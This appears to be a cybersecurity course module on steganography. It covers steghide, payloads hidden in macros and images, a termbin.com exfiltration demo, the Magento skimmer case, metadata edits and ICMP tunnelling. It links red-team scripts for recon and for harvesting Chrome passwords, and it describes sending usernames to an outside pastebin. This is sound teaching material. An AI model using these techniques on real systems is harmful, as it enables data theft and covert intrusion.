modulo 5 steganography

preface (1/2)

steganography

This module aims to provide a comprehensive introduction to the field of steganography, covering its use in

• cyber attacks
• data exfiltration
• the manipulation of metadata
• the manipulation of network traffic.

preface (2/2)

At the end of this module, you have reached the following goals

• You know the meaning of steganography You know how
• steganography is used in cyber attacks
• You know how steganography can be used in data exfiltration
• You know how metadata can be misused in steganography
• You know how network traffic can be misused in steganography

What is steganography?

Steganography comes from Greek steganographia, which combines the words

• steganós (στεγανός), meaning "covered or concealed",
• and -graphia (γραφή) meaning "writing"

So, steganography is the practice of concealing a message within another message or a physical object. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video.

Example of steganography (1/8)

For a better understanding of steganography, we’re going to illustrate it with an example. We start from an image of the minions, which will be used to conceal another file. We will use a linux machine and linux tools in this example.

Example of steganography (2/8)

With the linux command “steghide” you can hide data in various kinds of image and audio files. On the manpage of steghide, you can find the following options:

• You should use the embed command if you want to embed secret data in a cover file. The following arguments can be used with the embed command:
• -cf, --coverfile filename

Specify the cover file that will be used to embed data.

• -ef, --embedfile filename

Specify the file that will be embedded (the file that contains the secret message)

Example of steganography (3/8)

Create the file that you want to conceal, in this case hidden.txt.

Example of steganography (4/8)

Embed the secret data (which can be found in the text file) in the picture (which will function as a cover file) using the command steghide.

Example of steganography (5/8)

In linux, you can use the command file to determine the file type. If we check what type of file “minion.jpeg” is, we can see that an image is detected. The hidden text file will not be detected, only the cover file will be detected

Example of steganography (6/8)

But when we ask for info of the file via steghide, we can see that there is an embedded file.

Example of steganography (7/8)

When the figure is sent to another device, the hidden.txt file can be extracted. In the manpages of steghide you can find the following options:

• If you have received a file that contains a message that has been embedded with steghide, use the extract command to extract it. The following arguments can be used with this command:
• -sf, --stegofile filename

Specify the stego file (the file that contains embedded data).

• -xf, --extractfile filename

Create a file with the name filename and write the data that is embedded in the stego file to it.

Example of steganography (8/8)

When the extract is complete, we can read the content of the text file with the command cat. You see that the secret message will appear.

Introduction

As we took a look at the landscape of attackers, a lot of actions of attackers are automated via scripts. But how can you get these scripts on a victim's computer without being noticed? They use steganography!

Using macros

Attackers have been embedding actual scripts within macro-enabled Excel and Word documents. They try to get the victim to enable the macros and use various methods to do so. In the picture you can see an example of this. When the victim enables the content, a macro starts with the first step in the process of an attack.

Using pictures (1/4)

Attackers can also hide a script in a picture that people are downloading. Once a victim or a program downloads the picture, this script then can be activated on the victim's computer by another malicious program or by user interaction. We illustrate this with an example.

Using pictures (2/4)

This picture is used in one of the largest and longest lasting Monero crypto jacking operations known to exist, namely WatchDog.

Using pictures (3/4)

After downloading, you can take a look at the content of the picture, first you can see the data of the picture itself. But if you scroll down, you can see that there is not only data of the picture, but that there is also a script added.

Using pictures (4/4)

If we check the file against reputation servers like Virustotal (you can read more about reputation servers in the topic about hashing), then you will see that some security vendors flag the file as malicious.

Example of scripts (1/2)

Now we know that scripts can be launched to a victim via steganography. But what scripts are used by attackers? A first good step is snooping around, a phase of reconnaissance. We look at the potential victim to see what is active on the system and where we can discover any weaknesses that we can exploit. This script is an example of a harvesting script for a windows environment.

Example of scripts (2/2)

but if you google a little bit, you can find a lot of scripts which can be used in this kind of recon phase. For every purpose you can find a customized script. Examples of windows recon batch files: https://github.com/frizb/Windows-Privilege-Escalation/blob/master/windows_recon.bat https://github.com/jivoi/pentest/blob/master/post_win/recon.bat Collect Host & user details, Network details, Firewall details, Enumerate the Domain: https://github.com/BankSecurity/Red_Team/blob/master/Discovery/Host_Recon_Complete.bat Harvesting chrome saved password: https://github.com/BankSecurity/Red_Team/blob/master/Credential_Access/Chrome_Passwords.txt Get browser history: https://github.com/BankSecurity/Red_Team/blob/master/Discovery/Get_Browsers_History.txt

Introduction

Data exfiltration can be done in different ways and in different phases of an attack. Let us take a look at two examples: In the first example we’ll use an online tool for data exfiltration. The focus of this example is to explain what data exfiltration is. In the second example we’ll see an incident where steganography indeed was used for exfiltration, putting more focus on the steganography technique for exfiltration.

Example 1 (1/3)

In this example we’re going to use termbin.com It is a command-line pastebin specially made for programmers who can create, upload, and share their code with others. It has a dark interface, just like most of the coding editors, that delivers an instant programming environment to boost your experience.

Example 1 (2/3)

First, you’re going to decide what you want to pastebin. Maybe you want to see which users exist on the linux machine? Usernames are a nice first thing to know. It is the first part of an account. Let’s data exfiltrate the usernames using termbin.

Example 1 (3/3)

If you surf to the URL, you can indeed see all the usernames which exist on the local linux machine.

Example 2 (1/2)

In October 2016 Sucuri, a website security company, detected an infected Magento webshop. The following file was infected: app/code/core/Mage/Payment/Model/Method/Cc.php The content was edited and the following code was added.

Example 2 (2/2)

The attacker used an image file as an obfuscation technique to hide stolen credit card details from the website. This gives the attacker a secret place to store data. This was the image which contained the payment data:

What is metadata of a file?

Metadata is simply data about data. It is a description and context of the data. The metadata of a text file includes, among other things

• title and description
• tags and categories
• who created and when
• who last modified and when
• who can access or update

Or every time you take a photo with today's cameras a bunch of metadata is gathered and saved with it, like:

• date and time
• filename
• camera settings
• geolocation

Misuse of metadata - Example (1/4)

Metadata of a file can contain some very interesting and useful information. Attackers sometimes hide information in the metadata as well. For example, ExifTool is a Linux application that allows a user to view and manipulate the image’s metadata . For example, here you can see the metadata of a file called emoji.png

Misuse of metadata - Example (2/4)

With Exiftool you can also edit the metadata of files. In the manpage we can see the following section: -TAG[+-]=[VALUE] Write a new value for the specified tag (eg. "-comment=wow"), or delete the tag if no VALUE is given (eg. "-comment="). "+=" and "-=" are used to add or remove existing entries from a list, or to shift date/time values (see Image::ExifTool::Shift.pl for details). "+=" may also be used to increment numerical values, and "-=" may be used to conditionally delete or replace a tag (see ``WRITING EXAMPLES'' for examples).

Misuse of metadata - Example (3/4)

Let’s manipulate the metadata of the emoji.png file.

Misuse of metadata - Example (4/4)

Of course, this can be easily detected when taking a look at the metadata. But does an end user frequently look at metadata?

Introduction

Steganography with network traffic is the process of embedding information inside network control protocols used in data transfer, such as TCP, UDP, ICMP, … . All these protocols can be misused in terms of steganography. It works literally with any protocol from layer 1 to layer 7. We’re going to make it more clear via an example using an ICMP tunnel.

ICMP tunnel (1/4)

If we “ping” a destination, we can capture the data of the ping via wireshark. The last part of the packet will be padding, because the packet needs to have a minimum length.

ICMP tunnel (2/4)

IOn a linux system, in the manpage you can read the following:

• -p pattern

You may specify up to 16 ''pad'' bytes to fill out the packet you send. This is useful for diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.

ICMP tunnel (3/4)

“Hello World” is hexadecimal “48 65 6C 6C 6F 20 57 6F 72 6C 64”. We use this pattern in our ping command.

ICMP tunnel (4/4)

When you take a look at the capture of this ping, you can see that we are tunneling our secret message “Hello World” in the icmp protocol.

conclusion

Steganography is used a lot for malicious purposes. Different techniques can be implemented in cyber attacks. Below you can find some real world examples.

• Cybereason Exposes Campaign Targeting US Taxpayers with NetWire and Remcos Malware
• Cybercriminals are using steganography to hide their code and seek industrial data
• Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files
• Threats Making WAVs – Incident Response to a Cryptomining Attack